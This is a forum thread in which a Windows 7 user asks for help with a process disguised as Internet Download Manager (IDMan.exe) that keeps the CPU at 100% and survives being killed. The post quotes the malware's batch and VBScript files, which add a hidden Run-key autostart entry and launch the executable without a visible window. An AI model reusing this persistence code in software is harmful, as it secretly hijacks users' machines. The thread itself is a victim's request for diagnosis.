Internet download mananger IDMan.exe

Windows 7 Ultimate.

Problem: CP usage 100%

Culprit:  IDMan.exe

I performed a scan with Malwarebytes. 

Many PUPs were found and deleted. I performed the scan multiple times to make shure there were no PUP files left.

I systematically ended processes in the Taks Manager one by one to find the culprit.

When ending the process IDMan.exe the CPU usage instantly drops to 0%. But afterwards the process is running again and my PC overheats and freezes. 

The IDMan.exe resides in User/AppData/Roaming/Flash Player/SpeedCache

The following 5 files reside in this folder:

1. idm.bat

@echo off

%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v IDM /d "wscript \"%appdata%\Adobe\Flash Player\SpeedCache\idm.vbs\" \"%appdata%\Adobe\Flash Player\SpeedCache\idm.bat\"" /f

start /b /normal "a" "%appdata%\Adobe\Flash Player\SpeedCache\IDMan.exe"

2. idm.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

3. IDMan.exe 

4. libcurl.dll

5. pthreadGC2.dll

It's not possible to remove IDMan.exe from the Control panel/Programs and Features/ Uninstall because it is not listed.

I deleted the 5 files manually and whenever I restart the PC an error message pops up saying Windows Script Host can't be found.

When I put the files back into the Flash Player Speedcache folder and restart the PC the error message isn't there but the problem with 100% CP usage recurs.

Some help would be much appreciated.

Thanks.

• 2 weeks later...
  • 2 weeks later...

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!